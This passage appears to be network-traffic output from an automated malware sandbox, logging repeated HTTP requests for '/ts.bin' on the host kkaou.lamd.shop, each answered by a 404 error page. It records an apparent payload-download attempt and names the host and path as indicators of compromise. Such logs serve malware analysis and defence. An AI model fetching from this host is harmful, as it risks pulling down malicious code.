                                              Date: Mon, 25 Nov 2024 06:10:56 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:10.645879030 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:10.956330061 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:11.120078087 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:56 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:11.387598991 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:56 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:11.514283895 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:11.900319099 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:57 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:12.020796061 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:12.406930923 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:57 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:12.520155907 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:12.908046007 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:58 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:13.020324945 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:13.407478094 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:58 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:13.520366907 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:13.907073021 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:59 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:14.020242929 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:14.405982018 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:59 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:14.520242929 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:14.906061888 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:00 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:15.020354033 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:15.406105042 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:00 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:15.520715952 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:15.907605886 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:01 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:11:16.207920074 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:16.593772888 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:02 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:16.711572886 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:17.097598076 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:02 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
